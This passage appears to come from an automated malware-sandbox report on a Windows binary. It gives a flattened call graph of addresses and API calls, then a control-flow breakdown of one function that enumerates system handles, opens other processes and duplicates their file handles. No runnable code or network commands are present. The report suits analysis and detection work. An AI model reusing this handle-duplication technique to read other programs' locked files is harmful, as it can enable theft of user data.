39479->39480 39480->39490 39481 443dce 39481->39479 39485 443e22 39481->39485 39482 443e5a 39839 4300e8 memset memset memcpy 39482->39839 39485->39482 39838 41f0ac 102 API calls 39485->39838 39486 443e63 39487 416935 16 API calls 39486->39487 39488 443f3b 39487->39488 39488->39490 39840 42320f memset memcpy 39488->39840 39490->38886 39492 409a74 GetTempFileNameW 39491->39492 39493 409a66 GetWindowsDirectoryW 39491->39493 39492->38880 39493->39492 39841 424f07 11 API calls 39494->39841 39496 4251e4 39497 4251f7 39496->39497 39498 4251e8 39496->39498 39843 4250f8 39497->39843 39842 4446ea 11 API calls 39498->39842 39500 4251f2 39500->38918 39502 425209 39504 425249 39502->39504 39508 4250f8 126 API calls 39502->39508 39509 425287 39502->39509 39851 4384e9 134 API calls 39502->39851 39852 424f74 123 API calls 39502->39852 39503 415c7d 16 API calls 39503->39500 39504->39509 39853 424ff0 13 API calls 39504->39853 39508->39502 39509->39503 39510 425266 39510->39509 39854 415be9 memcpy 39510->39854 39512->38918 39513->38918 39514->38918 39515->38918 39516->38918 39517->38918 39518->38918 39519->38918 39520->38918 39521->38893 39522->38915 39555 4096c3 CreateFileW 39523->39555 39525 40cc34 39526 40cc3d GetFileSize 39525->39526 39527 40bbca 39525->39527 39528 40afcf 2 API calls 39526->39528 39527->39392 39535 40cf04 39527->39535 39529 40cc64 39528->39529 39556 40a2ef ReadFile 39529->39556 39531 40cc71 39557 40ab4a MultiByteToWideChar 39531->39557 39533 40cc95 CloseHandle 39534 40b04b ??3@YAXPAX 39533->39534 39534->39527 39536 40b633 free 39535->39536 39537 40cf14 39536->39537 39563 40b1ab free free 39537->39563 39539 40bbdd 39539->39392 39539->39397 39540 40cf1b 39540->39539 39542 40cfef 39540->39542 39564 40cd4b 39540->39564 39543 40cd4b 14 API calls 39542->39543 39543->39539 39545 40b633 free 39544->39545 39546 40cc15 39545->39546 39547 40aa04 free 39546->39547 39548 40cc1d 39547->39548 39613 40b1ab free free 39548->39613 39550 40b7d4 memset CreateFileW 39550->38873 39550->38874 39551->39400 39552->39402 39553->39410 39554->39413 39555->39525 39556->39531 39558 40ab93 39557->39558 39559 40ab6b 39557->39559 39558->39533 39560 40a9ce 4 API calls 39559->39560 39561 40ab74 39560->39561 39562 40ab7c MultiByteToWideChar 39561->39562 39562->39558 39563->39540 39565 40cd7b 39564->39565 39598 40aa29 39565->39598 39567 40cef5 39568 40aa04 free 39567->39568 39569 40cefd 39568->39569 39569->39540 39571 40aa29 6 API calls 39572 40ce1d 39571->39572 39573 40aa29 6 API calls 39572->39573 39574 40ce3e 39573->39574 39575 40ce6a 39574->39575 39606 40abb7 wcslen memmove 39574->39606 39576 40ce9f 39575->39576 39609 40abb7 wcslen memmove 39575->39609 39579 40a8d0 7 API calls 39576->39579 39582 40ceb5 39579->39582 39580 40ce56 39607 40aa71 wcslen 39580->39607 39581 40ce8b 39610 40aa71 wcslen 39581->39610 39588 40a8d0 7 API calls 39582->39588 39585 40ce5e 39608 40abb7 wcslen memmove 39585->39608 39586 40ce93 39611 40abb7 wcslen memmove 39586->39611 39590 40cecb 39588->39590 39612 40d00b malloc memcpy free free 39590->39612 39592 40cedd 39593 40aa04 free 39592->39593 39594 40cee5 39593->39594 39595 40aa04 free 39594->39595 39596 40ceed 39595->39596 39597 40aa04 free 39596->39597 39597->39567 39599 40aa33 39598->39599 39605 40aa63 39598->39605 39600 40aa44 39599->39600 39601 40aa38 wcslen 39599->39601 39602 40a9ce malloc memcpy free free 39600->39602 39601->39600 39603 40aa4d 39602->39603 39604 40aa51 memcpy 39603->39604 39603->39605 39604->39605 39605->39567 39605->39571 39606->39580 39607->39585 39608->39575 39609->39581 39610->39586 39611->39576 39612->39592 39613->39550 39615 4438d0 39614->39615 39625 4438c9 39614->39625 39702 415378 memcpy memcpy 39615->39702 39625->39424 39629 415a77 39628->39629 39630 415a8d 39629->39630 39631 415a7e memset 39629->39631 39630->39428 39631->39630 39633 4438b5 11 API calls 39632->39633 39634 41525d 39633->39634 39634->39433 39636 444328 39635->39636 39637 444423 39636->39637 39638 44434e 39636->39638 39703 4446ea 11 API calls 39637->39703 39639 432d4e 3 API calls 39638->39639 39641 44435a 39639->39641 39643 444375 39641->39643 39648 44438b 39641->39648 39642 432d4e 3 API calls 39644 4443ec 39642->39644 39645 416935 16 API calls 39643->39645 39646 444381 39644->39646 39647 416935 16 API calls 39644->39647 39645->39646 39646->39439 39647->39646 39648->39642 39650 432d65 39649->39650 39651 432d58 39649->39651 39650->39447 39704 432cc4 memset memset memcpy 39651->39704 39654 41eee2 39653->39654 39655 415a6d memset 39654->39655 39656 41ef23 39655->39656 39657 415a6d memset 39656->39657 39668 41ef2d 39656->39668 39658 41ef42 39657->39658 39662 41ef49 39658->39662 39705 41b7d9 39658->39705 39660 41ef66 39661 41ef74 memset 39660->39661 39660->39662 39663 41ef91 39661->39663 39666 41ef9e 39661->39666 39662->39668 39720 41b321 100 API calls 39662->39720 39665 41519d 6 API calls 39663->39665 39665->39666 39666->39662 39719 41b1ca memset __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 39666->39719 39668->39450 39670 433033 39669->39670 39671 433042 39669->39671 39726 421f20 memset 39670->39726 39727 415a91 39671->39727 39674 43303f 39674->39456 39703->39646 39704->39650 39711 41b812 39705->39711 39706 415a6d memset 39707 41b8c2 39706->39707 39708 41b980 39707->39708 39709 41b902 memcpy memcpy memcpy memcpy memcpy 39707->39709 39714 41b849 39707->39714 39716 41b9ad 39708->39716 39722 4151e3 39708->39722 39709->39708 39711->39714 39718 41b884 39711->39718 39721 444706 11 API calls 39711->39721 39714->39660 39716->39714 39725 41b1ca memset __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 39716->39725 39718->39706 39718->39714 39719->39662 39720->39668 39721->39718 39724 41837f 54 API calls 39722->39724 39726->39674 39728 415a9d 39727->39728 39729 415ab3 39728->39729 39730 415aa4 memset 39728->39730 39729->39674 39730->39729 39759 41703f 39747->39759 39749 43847a 39750 43848a 39749->39750 39751 43847e 39749->39751 39766 438270 39750->39766 39796 4446ea 11 API calls 39751->39796 39756 4384bb 39757 438270 133 API calls 39756->39757 39758 438488 39757->39758 39758->39470 39760 417044 39759->39760 39761 41705c 39759->39761 39765 417055 39760->39765 39798 416760 11 API calls 39760->39798 39762 417075 39761->39762 39799 41707a 11 API calls 39761->39799 39762->39749 39765->39749 39767 415a91 memset 39766->39767 39768 43828d 39767->39768 39769 438297 39768->39769 39770 438341 39768->39770 39772 4382d6 39768->39772 39771 415c7d 16 API calls 39769->39771 39800 44358f 39770->39800 39774 438458 39771->39774 39775 4382fb 39772->39775 39776 4382db 39772->39776 39774->39758 39797 424f26 122 API calls 39774->39797 39831 415c23 memcpy 39775->39831 39777 416935 16 API calls 39776->39777 39779 4382e9 39777->39779 39781 415c7d 16 API calls 39779->39781 39780 438305 39783 44358f 19 API calls 39780->39783 39786 438318 39780->39786 39781->39769 39782 438373 39785 438383 39782->39785 39832 4300e8 memset memset memcpy 39782->39832 39783->39786 39789 4383cd 39785->39789 39833 415c23 memcpy 39785->39833 39786->39782 39826 43819e 39786->39826 39788 4383f5 39792 438404 39788->39792 39793 43841c 39788->39793 39789->39788 39834 42453e 122 API calls 39789->39834 39795 416935 16 API calls 39792->39795 39794 416935 16 API calls 39793->39794 39794->39769 39795->39769 39796->39758 39797->39756 39798->39765 39799->39760 39801 4435be 39800->39801 39803 443676 39801->39803 39806 4436ce 39801->39806 39809 442ff8 19 API calls 39801->39809 39810 44366c 39801->39810 39824 44360c 39801->39824 39802 443758 39805 441409 memset 39802->39805 39814 443775 39802->39814 39803->39802 39804 443737 39803->39804 39807 442ff8 19 API calls 39803->39807 39808 442ff8 19 API calls 39804->39808 39805->39802 39812 4165ff 11 API calls 39806->39812 39807->39804 39808->39802 39809->39801 39813 4169a7 11 API calls 39810->39813 39811 4437be 39815 416760 11 API calls 39811->39815 39816 4437de 39811->39816 39812->39803 39813->39803 39814->39811 39820 415c56 11 API calls 39814->39820 39815->39816 39817 42463b memset memcpy 39816->39817 39819 443801 39816->39819 39817->39819 39818 443826 39822 43bd08 memset 39818->39822 39819->39818 39821 43024d memset 39819->39821 39820->39811 39821->39818 39823 443837 39822->39823 39823->39824 39825 43024d memset 39823->39825 39824->39786 39825->39823 39827 438246 39826->39827 39829 4381ba 39826->39829 39827->39782 39828 41f432 109 API calls 39828->39829 39829->39827 39829->39828 39830 41f638 103 API calls 39829->39830 39830->39829 39831->39780 39832->39785 39833->39789 39834->39788 39835->39474 39836->39490 39837->39481 39838->39485 39839->39486 39840->39490 39841->39496 39842->39500 39844 425108 39843->39844 39850 42510d 39843->39850 39887 424f74 123 API calls 39844->39887 39847 42516e 39849 415c7d 16 API calls 39847->39849 39848 425115 39848->39502 39849->39848 39850->39848 39855 42569b 39850->39855 39851->39502 39852->39502 39853->39510 39854->39509 39865 4256f1 39855->39865 39883 4259c2 39855->39883 39860 4260dd 39899 424251 119 API calls 39860->39899 39861 429a4d 39868 429a66 39861->39868 39869 429a9b 39861->39869 39865->39861 39866 422aeb memset memcpy memcpy 39865->39866 39871 4260a1 39865->39871 39880 4259da 39865->39880 39881 429ac1 39865->39881 39865->39883 39886 425a38 39865->39886 39888 4227f0 memset memcpy 39865->39888 39889 422b84 15 API calls 39865->39889 39890 422b5d memset memcpy memcpy 39865->39890 39891 422640 13 API calls 39865->39891 39893 4241fc 11 API calls 39865->39893 39894 42413a 89 API calls 39865->39894 39866->39865 39900 415c56 11 API calls 39868->39900 39870 429a96 39869->39870 39902 416760 11 API calls 39869->39902 39903 424251 119 API calls 39870->39903 39897 415c56 11 API calls 39871->39897 39873 429a7a 39901 416760 11 API calls 39873->39901 39898 416760 11 API calls 39880->39898 39882 425ad6 39881->39882 39904 415c56 11 API calls 39881->39904 39882->39847 39883->39882 39892 415c56 11 API calls 39883->39892 39886->39883 39895 422640 13 API calls 39886->39895 39896 4226e0 12 API calls 39886->39896 39887->39850 39888->39865 39889->39865 39890->39865 39891->39865 39892->39880 39893->39865 39894->39865 39895->39886 39896->39886 39897->39880 39898->39860 39899->39882 39900->39873 39901->39870 39902->39870 39903->39881 39904->39880 39905->38953 39906->38961 39916 44def7 39917 44df07 39916->39917 39918 44df00 ??3@YAXPAX 39916->39918 39919 44df17 39917->39919 39920 44df10 ??3@YAXPAX 39917->39920 39918->39917 39921 44df27 39919->39921 39922 44df20 ??3@YAXPAX 39919->39922 39920->39919 39923 44df37 39921->39923 39924 44df30 ??3@YAXPAX 39921->39924 39922->39921 39924->39923 37718 44dea5 37719 44deb5 FreeLibrary 37718->37719 37720 44dec3 37718->37720 37719->37720 39925 4148b6 FindResourceW 39926 4148f9 39925->39926 39927 4148cf SizeofResource 39925->39927 39927->39926 39928 4148e0 LoadResource 39927->39928 39928->39926 39929 4148ee LockResource 39928->39929 39929->39926 37897 415304 free 39930 441b3f 39940 43a9f6 39930->39940 39932 441b61 40113 4386af memset 39932->40113 39934 44189a 39935 4418e2 39934->39935 39937 442bd4 39934->39937 39936 4418ea 39935->39936 40114 4414a9 12 API calls 39935->40114 39937->39936 40115 441409 memset 39937->40115 39941 43aa20 39940->39941 39948 43aadf 39940->39948 39942 43aa34 memset 39941->39942 39941->39948 39943 43aa56 39942->39943 39944 43aa4d 39942->39944 40116 43a6e7 39943->40116 40124 42c02e memset 39944->40124 39948->39932 39950 43aad3 40126 4169a7 11 API calls 39950->40126 39951 43aaae 39951->39948 39951->39950 39966 43aae5 39951->39966 39952 43ac18 39955 43ac47 39952->39955 40128 42bbd5 memcpy memcpy memcpy memset memcpy 39952->40128 39956 43aca8 39955->39956 40129 438eed 16 API calls 39955->40129 39960 43acd5 39956->39960 40131 4233ae 11 API calls 39956->40131 39959 43ac87 40130 4233c5 16 API calls 39959->40130 40132 423426 11 API calls 39960->40132 39964 43ace1 40133 439811 162 API calls 39964->40133 39965 43a9f6 160 API calls 39965->39966 39966->39948 39966->39952 39966->39965 40127 439bbb 22 API calls 39966->40127 39968 43acfd 39973 43ad2c 39968->39973 40134 438eed 16 API calls 39968->40134 39970 43ad19 40135 4233c5 16 API calls 39970->40135 39972 43ad58 40136 44081d 162 API calls 39972->40136 39973->39972 39976 43add9 39973->39976 39976->39976 40140 423426 11 API calls 39976->40140 39977 43ae3a memset 39978 43ae73 39977->39978 40141 42e1c0 146 API calls 39978->40141 39979 43adab 40138 438c4e 162 API calls 39979->40138 39980 43ad6c 39980->39948 39980->39979 40137 42370b memset memcpy memset 39980->40137 39984 43adcc 40139 440f84 12 API calls 39984->40139 39985 43ae96 40142 42e1c0 146 API calls 39985->40142 39988 43aea8 39991 43aec1 39988->39991 40143 42e199 146 API calls 39988->40143 39990 43af00 39990->39948 39995 43af1a 39990->39995 39996 43b3d9 39990->39996 39991->39990 40144 42e1c0 146 API calls 39991->40144 39992 43add4 39997 43b60f 39992->39997 40203 438f86 16 API calls 39992->40203 40145 438eed 16 API calls 39995->40145 40001 43b3f6 39996->40001 40006 43b4c8 39996->40006 39997->39948 40204 4393a5 17 API calls 39997->40204 40000 43af2f 40146 4233c5 16 API calls 40000->40146 40186 432878 12 API calls 40001->40186 40003 43af51 40147 423426 11 API calls 40003->40147 40005 43b4f2 40193 43a76c 21 API calls 40005->40193 40006->40005 40192 42bbd5 memcpy memcpy memcpy memset memcpy 40006->40192 40008 43af7d 40148 423426 11 API calls 40008->40148 40012 43af94 40149 423330 11 API calls 40012->40149 40013 43b529 40194 44081d 162 API calls 40013->40194 40014 43b462 40188 423330 11 API calls 40014->40188 40018 43b544 40022 43b55c 40018->40022 40195 42c02e memset 40018->40195 40019 43b428 40019->40014 40187 432b60 16 API calls 40019->40187 40020 43afca 40150 423330 11 API calls 40020->40150 40021 43b47e 40024 43b497 40021->40024 40189 42374a memcpy memset memcpy memcpy memcpy 40021->40189 40196 43a87a 162 API calls 40022->40196 40190 4233ae 11 API calls 40024->40190 40027 43afdb 40151 4233ae 11 API calls 40027->40151 40030 43b4b1 40191 423399 11 API calls 40030->40191 40032 43b56c 40035 43b58a 40032->40035 40197 423330 11 API calls 40032->40197 40034 43afee 40152 44081d 162 API calls 40034->40152 40198 440f84 12 API calls 40035->40198 40036 43b4c1 40200 42db80 162 API calls 40036->40200 40041 43b592 40199 43a82f 16 API calls 40041->40199 40044 43b5b4 40201 438c4e 162 API calls 40044->40201 40046 43b5cf 40202 42c02e memset 40046->40202 40048 43b005 40048->39948 40053 43b01f 40048->40053 40153 42d836 162 API calls 40048->40153 40049 43b1ef 40163 4233c5 16 API calls 40049->40163 40051 43b212 40164 423330 11 API calls 40051->40164 40053->40049 40161 423330 11 API calls 40053->40161 40162 42d71d 162 API calls 40053->40162 40055 43b087 40154 4233ae 11 API calls 40055->40154 40058 43b22a 40165 42ccb5 11 API calls 40058->40165 40061 43b23f 40166 4233ae 11 API calls 40061->40166 40062 43b10f 40157 423330 11 API calls 40062->40157 40064 43b257 40167 4233ae 11 API calls 40064->40167 40068 43b129 40158 4233ae 11 API calls 40068->40158 40069 43b26e 40168 4233ae 11 API calls 40069->40168 40072 43b09a 40072->40062 40155 42cc15 19 API calls 40072->40155 40156 4233ae 11 API calls 40072->40156 40074 43b282 40169 43a87a 162 API calls 40074->40169 40075 43b13c 40159 440f84 12 API calls 40075->40159 40077 43b29d 40170 423330 11 API calls 40077->40170 40080 43b15f 40160 4233ae 11 API calls 40080->40160 40081 43b2af 40083 43b2b8 40081->40083 40084 43b2ce 40081->40084 40171 4233ae 11 API calls 40083->40171 40172 440f84 12 API calls 40084->40172 40087 43b2c9 40174 4233ae 11 API calls 40087->40174 40088 43b2da 40173 42370b memset memcpy memset 40088->40173 40091 43b2f9 40175 423330 11 API calls 40091->40175 40093 43b30b 40176 423330 11 API calls 40093->40176 40095 43b325 40177 423399 11 API calls 40095->40177 40097 43b332 40178 4233ae 11 API calls 40097->40178 40099 43b354 40179 423399 11 API calls 40099->40179 40101 43b364 40180 43a82f 16 API calls 40101->40180 40103 43b370 40181 42db80 162 API calls 40103->40181 40105 43b380 40182 438c4e 162 API calls 40105->40182 40107 43b39e 40183 423399 11 API calls 40107->40183 40109 43b3ae 40184 43a76c 21 API calls 40109->40184 40111 43b3c3 40185 423399 11 API calls 40111->40185 40113->39934 40114->39936 40115->39937 40117 43a6f5 40116->40117 40118 43a765 40116->40118 40117->40118 40205 42a115 40117->40205 40118->39948 40125 4397fd memset 40118->40125 40122 43a73d 40122->40118 40123 42a115 146 API calls 40122->40123 40123->40118 40124->39943 40125->39951 40126->39948 40127->39966 40128->39955 40129->39959 40130->39956 40131->39960 40132->39964 40133->39968 40134->39970 40135->39973 40136->39980 40137->39979 40138->39984 40139->39992 40140->39977 40141->39985 40142->39988 40143->39991 40144->39991 40145->40000 40146->40003 40147->40008 40148->40012 40149->40020 40150->40027 40151->40034 40152->40048 40153->40055 40154->40072 40155->40072 40156->40072 40157->40068 40158->40075 40159->40080 40160->40053 40161->40053 40162->40053 40163->40051 40164->40058 40165->40061 40166->40064 40167->40069 40168->40074 40169->40077 40170->40081 40171->40087 40172->40088 40173->40087 40174->40091 40175->40093 40176->40095 40177->40097 40178->40099 40179->40101 40180->40103 40181->40105 40182->40107 40183->40109 40184->40111 40185->39992 40186->40019 40187->40014 40188->40021 40189->40024 40190->40030 40191->40036 40192->40005 40193->40013 40194->40018 40195->40022 40196->40032 40197->40035 40198->40041 40199->40036 40200->40044 40201->40046 40202->39992 40203->39997 40204->39948 40206 42a175 40205->40206 40208 42a122 40205->40208 40206->40118 40211 42b13b 146 API calls 40206->40211 40208->40206 40209 42a115 146 API calls 40208->40209 40212 43a174 40208->40212 40236 42a0a8 146 API calls 40208->40236 40209->40208 40211->40122 40226 43a196 40212->40226 40227 43a19e 40212->40227 40213 43a306 40213->40226 40250 4388c4 14 API calls 40213->40250 40216 42a115 146 API calls 40216->40227 40217 415a91 memset 40217->40227 40218 43a642 40218->40226 40255 4169a7 11 API calls 40218->40255 40222 43a635 40254 42c02e memset 40222->40254 40226->40208 40227->40213 40227->40216 40227->40217 40227->40226 40237 42ff8c 40227->40237 40245 4165ff 11 API calls 40227->40245 40246 439504 13 API calls 40227->40246 40247 4312d0 146 API calls 40227->40247 40248 42be4c memcpy memcpy memcpy memset memcpy 40227->40248 40249 43a121 11 API calls 40227->40249 40228 43a325 40228->40218 40228->40222 40228->40226 40230 42bf4c 14 API calls 40228->40230 40231 4169a7 11 API calls 40228->40231 40232 42b5b5 memset memcpy 40228->40232 40251 42b63e 14 API calls 40228->40251 40252 4165ff 11 API calls 40228->40252 40253 42bfcf memcpy 40228->40253 40230->40228 40231->40228 40232->40228 40236->40208 40256 43817e 40237->40256 40239 42ff99 40240 42ffe3 40239->40240 40241 42ffd0 40239->40241 40244 42ff9d 40239->40244 40261 4169a7 11 API calls 40240->40261 40260 4169a7 11 API calls 40241->40260 40244->40227 40245->40227 40246->40227 40247->40227 40248->40227 40249->40227 40250->40228 40251->40228 40252->40228 40253->40228 40254->40218 40255->40226 40257 438187 40256->40257 40258 438192 40256->40258 40262 4380f6 40257->40262 40258->40239 40260->40244 40261->40244 40264 43811f 40262->40264 40263 438164 40263->40258 40264->40263 40267 437e5e 40264->40267 40290 4300e8 memset memset memcpy 40264->40290 40291 437d3c 40267->40291 40269 437ea9 40275 437eb3 40269->40275 40276 437f22 40269->40276 40306 41f432 40269->40306 40272 437f06 40317 415c56 11 API calls 40272->40317 40274 437f95 40318 415c56 11 API calls 40274->40318 40275->40264 40277 437f7f 40276->40277 40278 432d4e 3 API calls 40276->40278 40277->40274 40279 43802b 40277->40279 40278->40277 40319 4165ff 11 API calls 40279->40319 40282 438054 40320 437371 137 API calls 40282->40320 40285 43806b 40286 438094 40285->40286 40321 42f50e 137 API calls 40285->40321 40287 437fa3 40286->40287 40322 4300e8 memset memset memcpy 40286->40322 40287->40275 40323 41f638 103 API calls 40287->40323 40290->40264 40292 437d69 40291->40292 40295 437d80 40291->40295 40324 437ccb 11 API calls 40292->40324 40294 437d76 40294->40269 40295->40294 40296 437da3 40295->40296 40299 437d90 40295->40299 40298 438460 133 API calls 40296->40298 40302 437dcb 40298->40302 40299->40294 40328 437ccb 11 API calls 40299->40328 40300 437de8 40327 424f26 122 API calls 40300->40327 40302->40300 40325 444283 13 API calls 40302->40325 40304 437dfc 40326 437ccb 11 API calls 40304->40326 40307 41f54d 40306->40307 40313 41f44f 40306->40313 40308 41f466 40307->40308 40358 41c635 memset memset 40307->40358 40308->40272 40308->40276 40313->40308 40315 41f50b 40313->40315 40329 41f1a5 40313->40329 40354 41c06f memcmp 40313->40354 40355 41f3b1 89 API calls 40313->40355 40356 41f398 85 API calls 40313->40356 40315->40307 40315->40308 40357 41c295 85 API calls 40315->40357 40317->40275 40318->40287 40319->40282 40320->40285 40321->40286 40322->40287 40323->40275 40324->40294 40325->40304 40326->40300 40327->40294 40328->40294 40330 41bc3b 100 API calls 40329->40330 40331 41f1b4 40330->40331 40332 41edad 85 API calls 40331->40332 40339 41f282 40331->40339 40333 41f1cb 40332->40333 40334 41f1f5 memcmp 40333->40334 40335 41f20e 40333->40335 40333->40339 40334->40335 40336 41f21b memcmp 40335->40336 40335->40339 40337 41f326 40336->40337 40340 41f23d 40336->40340 40338 41ee6b 85 API calls 40337->40338 40337->40339 40338->40339 40339->40313 40340->40337 40341 41f28e memcmp 40340->40341 40343 41c8df 55 API calls 40340->40343 40341->40337 40342 41f2a9 40341->40342 40342->40337 40345 41f308 40342->40345 40346 41f2d8 40342->40346 40344 41f269 40343->40344 40344->40337 40347 41f287 40344->40347 40348 41f27a 40344->40348 40345->40337 40352 4446ce 11 API calls 40345->40352 40349 41ee6b 85 API calls 40346->40349 40347->40341 40350 41ee6b 85 API calls 40348->40350 40351 41f2e0 40349->40351 40350->40339 40353 41b1ca memset 40351->40353 40352->40337 40353->40339 40354->40313 40355->40313 40356->40313 40357->40307 40358->40308 40390 41493c EnumResourceNamesW 37722 4287c1 37723 4287d2 37722->37723 37724 429ac1 37722->37724 37725 428818 37723->37725 37726 42881f 37723->37726 37740 425711 37723->37740 37736 425ad6 37724->37736 37792 415c56 11 API calls 37724->37792 37759 42013a 37725->37759 37787 420244 96 API calls 37726->37787 37730 4260dd 37786 424251 119 API calls 37730->37786 37734 4259da 37785 416760 11 API calls 37734->37785 37737 429a4d 37743 429a66 37737->37743 37744 429a9b 37737->37744 37740->37724 37740->37734 37740->37737 37741 422aeb memset memcpy memcpy 37740->37741 37746 4260a1 37740->37746 37755 4259c2 37740->37755 37758 425a38 37740->37758 37775 4227f0 memset memcpy 37740->37775 37776 422b84 15 API calls 37740->37776 37777 422b5d memset memcpy memcpy 37740->37777 37778 422640 13 API calls 37740->37778 37780 4241fc 11 API calls 37740->37780 37781 42413a 89 API calls 37740->37781 37741->37740 37788 415c56 11 API calls 37743->37788 37745 429a96 37744->37745 37790 416760 11 API calls 37744->37790 37791 424251 119 API calls 37745->37791 37784 415c56 11 API calls 37746->37784 37748 429a7a 37789 416760 11 API calls 37748->37789 37755->37736 37779 415c56 11 API calls 37755->37779 37758->37755 37782 422640 13 API calls 37758->37782 37783 4226e0 12 API calls 37758->37783 37760 42014c 37759->37760 37763 420151 37759->37763 37802 41e466 96 API calls 37760->37802 37762 420162 37762->37740 37763->37762 37764 4201b3 37763->37764 37765 420229 37763->37765 37766 4201b8 37764->37766 37767 4201dc 37764->37767 37765->37762 37768 41fd5e 85 API calls 37765->37768 37793 41fbdb 37766->37793 37767->37762 37772 4201ff 37767->37772 37799 41fc4c 37767->37799 37768->37762 37772->37762 37774 42013a 96 API calls 37772->37774 37774->37762 37775->37740 37776->37740 37777->37740 37778->37740 37779->37734 37780->37740 37781->37740 37782->37758 37783->37758 37784->37734 37785->37730 37786->37736 37787->37740 37788->37748 37789->37745 37790->37745 37791->37724 37792->37734 37794 41fbf8 37793->37794 37797 41fbf1 37793->37797 37807 41ee26 37794->37807 37798 41fc39 37797->37798 37817 4446ce 11 API calls 37797->37817 37798->37762 37803 41fd5e 37798->37803 37800 41ee6b 85 API calls 37799->37800 37801 41fc5d 37800->37801 37801->37767 37802->37763 37806 41fd65 37803->37806 37804 41fdab 37804->37762 37805 41fbdb 85 API calls 37805->37806 37806->37804 37806->37805 37808 41ee41 37807->37808 37809 41ee32 37807->37809 37818 41edad 37808->37818 37821 4446ce 11 API calls 37809->37821 37812 41ee3c 37812->37797 37815 41ee58 37815->37812 37823 41ee6b 37815->37823 37817->37798 37827 41be52 37818->37827 37821->37812 37822 41eb85 11 API calls 37822->37815 37824 41ee70 37823->37824 37825 41ee78 37823->37825 37883 41bf99 85 API calls 37824->37883 37825->37812 37828 41be6f 37827->37828 37829 41be5f 37827->37829 37834 41be8c 37828->37834 37848 418c63 37828->37848 37862 4446ce 11 API calls 37829->37862 37831 41be69 37831->37812 37831->37822 37834->37831 37835 41bf3a 37834->37835 37836 41bed1 37834->37836 37839 41bee7 37834->37839 37865 4446ce 11 API calls 37835->37865 37838 41bef0 37836->37838 37841 41bee2 37836->37841 37838->37839 37840 41bf01 37838->37840 37839->37831 37866 41a453 85 API calls 37839->37866 37842 41bf24 memset 37840->37842 37844 41bf14 37840->37844 37863 418a6d memset memcpy memset 37840->37863 37852 41ac13 37841->37852 37842->37831 37864 41a223 memset memcpy memset 37844->37864 37847 41bf20 37847->37842 37849 418c72 37848->37849 37850 418c94 37849->37850 37851 418d51 memset memset 37849->37851 37850->37834 37851->37850 37853 41ac52 37852->37853 37854 41ac3f memset 37852->37854 37857 41ac6a 37853->37857 37867 41dc14 19 API calls 37853->37867 37855 41acd9 37854->37855 37855->37839 37859 41aca1 37857->37859 37868 41519d 37857->37868 37859->37855 37860 41acc0 memset 37859->37860 37861 41accd memcpy 37859->37861 37860->37855 37861->37855 37862->37831 37863->37844 37864->37847 37865->37839 37867->37857 37871 4175ed 37868->37871 37879 417570 SetFilePointer 37871->37879 37874 41760a ReadFile 37876 417637 37874->37876 37877 417627 GetLastError 37874->37877 37875 4151b3 37875->37859 37876->37875 37878 41763e memset 37876->37878 37877->37875 37878->37875 37880 4175b2 37879->37880 37881 41759c GetLastError 37879->37881 37880->37874 37880->37875 37881->37880 37882 4175a8 GetLastError 37881->37882 37882->37880 37883->37825 37884 417bc5 37886 417c61 37884->37886 37890 417bda 37884->37890 37885 417bf6 UnmapViewOfFile CloseHandle 37885->37885 37885->37890 37888 417c2c 37888->37890 37896 41851e 18 API calls 37888->37896 37890->37885 37890->37886 37890->37888 37891 4175b7 37890->37891 37892 4175d6 CloseHandle 37891->37892 37893 4175c8 37892->37893 37894 4175df 37892->37894 37893->37894 37895 4175ce Sleep 37893->37895 37894->37890 37895->37892 37896->37888 39907 4147f3 39910 414561 39907->39910 39909 414813 39911 41456d 39910->39911 39912 41457f GetPrivateProfileIntW 39910->39912 39915 4143f1 memset _itow WritePrivateProfileStringW 39911->39915 39912->39909 39914 41457a 39914->39909 39915->39914

                                          Executed Functions

                                          Function 0040DD85 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 212filenativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 353 40de5a 351->353 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 355 40de5d-40de63 353->355 357 40de74-40de78 355->357 358 40de65-40de6c 355->358 357->352 357->355 358->357 360 40de6e-40de71 358->360 360->357 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->377 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                          APIs
                                          • memset.MSVCRT ref: 0040DDAD
                                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                          • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                            • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                          • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                          • CloseHandle.KERNEL32(C0000004), ref: 0040DE3E
                                          • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                          • _wcsicmp.MSVCRT ref: 0040DEB2
                                          • _wcsicmp.MSVCRT ref: 0040DEC5
                                          • _wcsicmp.MSVCRT ref: 0040DED8
